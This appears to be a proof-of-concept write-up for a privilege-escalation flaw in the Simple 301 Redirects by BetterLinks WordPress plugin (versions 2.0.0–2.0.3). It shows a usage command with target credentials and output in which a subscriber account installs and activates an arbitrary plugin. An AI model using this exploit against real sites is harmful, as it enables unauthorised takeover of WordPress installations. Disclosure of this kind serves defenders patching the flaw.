Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Subscriber + Arbitrary Plugin Installation
A lack of capability checks and insufficient nonce check on the AJAX action in the plugin, made it possible for authenticated users to install arbitrary plugins on vulnerable sites.
$ python3 --url http://wordpress.lan --username user --password useruser1 --slug betterlinks
Getting REST API Nonce!
Nonce Found: dd72f43027
Installing Plugin!
{"success":true,"data":"Plugin is installed successfully!"}
Activating Plugin!
{"success":true,"data":"BetterLinks is activated!"}
Note: Some plugins might not activate if not you need to change sluga variable to the path/file.php that is the main file for the plugin currently works really well when the slug is something like betterlinks and the main file of the plugin is called betterlinks.php